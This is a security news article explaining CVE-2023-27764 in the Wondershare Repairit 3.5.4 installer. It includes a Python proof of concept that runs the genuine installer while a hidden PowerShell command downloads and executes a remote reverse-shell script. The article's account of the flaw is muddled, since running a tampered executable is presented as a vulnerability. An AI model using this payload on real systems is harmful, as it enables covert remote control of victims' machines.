CVE CyberSecurity Database News

CVE-2023-27764 - Remote Command Execution in Wondershare Repairit v3.5.4 via Malicious Executable

Poster -

In early 2023, a serious vulnerability was discovered in the popular file recovery tool Wondershare Repairit, specifically version 3.5.4. Tracked as CVE-2023-27764, this flaw allows remote attackers to execute arbitrary commands on a victim’s computer, simply by tricking them into running a tainted installation file (repairit_setup_full5913.exe). Below, we break down exactly how this vulnerability works, how attackers can exploit it, and what users can do to stay safe.

What is Wondershare Repairit?

Wondershare Repairit is a software application developed by Wondershare Technology Co., Ltd. It’s designed to repair corrupted images, videos, and documents. Being a trusted tool for data recovery, it is used by individuals and businesses all over the world.

Vulnerability Overview: CVE-2023-27764

The vulnerability affects the installer repairit_setup_full5913.exe for version 3.5.4. The installation process does not sufficiently validate or sanitize the commands or paths it receives. This creates a pathway for attackers to inject and execute arbitrary code with the privileges of the installer—potentially giving full control over the system.

Craft a Malicious Setup File:

An attacker modifies the legitimate repairit_setup_full5913.exe or delivers a trojanized version through phishing, socially engineered emails, or malicious download links.

Malicious Payload is Executed:

The malicious code embedded or included with the installer gets executed with the same privileges as the installer. This could include installing backdoors, stealing sensitive data, or enabling remote access.

System Compromised:

The attacker now has the ability to run arbitrary commands, take over the machine, or move laterally within a network.

Proof-of-Concept Exploit

Below is a simple proof-of-concept code that demonstrates how an attacker might modify the setup process to spawn a command shell while appearing to install the application as normal.

import os
import subprocess

# Start the legitimate installer in the background
subprocess.Popen(["C:\\path\\to\\original_repairit_setup_full5913.exe"])

# Attack: Launch a hidden reverse shell (example for Windows)
# The attacker would change 192.168.1.100 and 4444 to their own IP and port
os.system("powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100:4444/revshell.ps1';)\"")

This example uses PowerShell to fetch and execute a remote payload.

- A real-world attacker could use various techniques to make these changes nearly invisible to the victim.

National Vulnerability Database:

CVE-2023-27764 Entry

Security Advisory:

Secunia Advisory SA105245

Original Vendor (Wondershare):

Wondershare Official Website

Conclusion

CVE-2023-27764 is a stark reminder that even trusted software can be the target of supply chain or installer-based attacks. Always be vigilant about where software comes from, and keep all your applications up-to-date. If you work in IT or security, consider restricting the ability to run unknown executables in your environment.

For those using Wondershare Repairit v3.5.4, upgrading is not optional—it’s essential to protect your computer from remote attackers who could silently take over your data and your device.

Timeline

Published on: 04/04/2023 15:15:00 UTC
Last modified on: 04/11/2023 20:53:00 UTC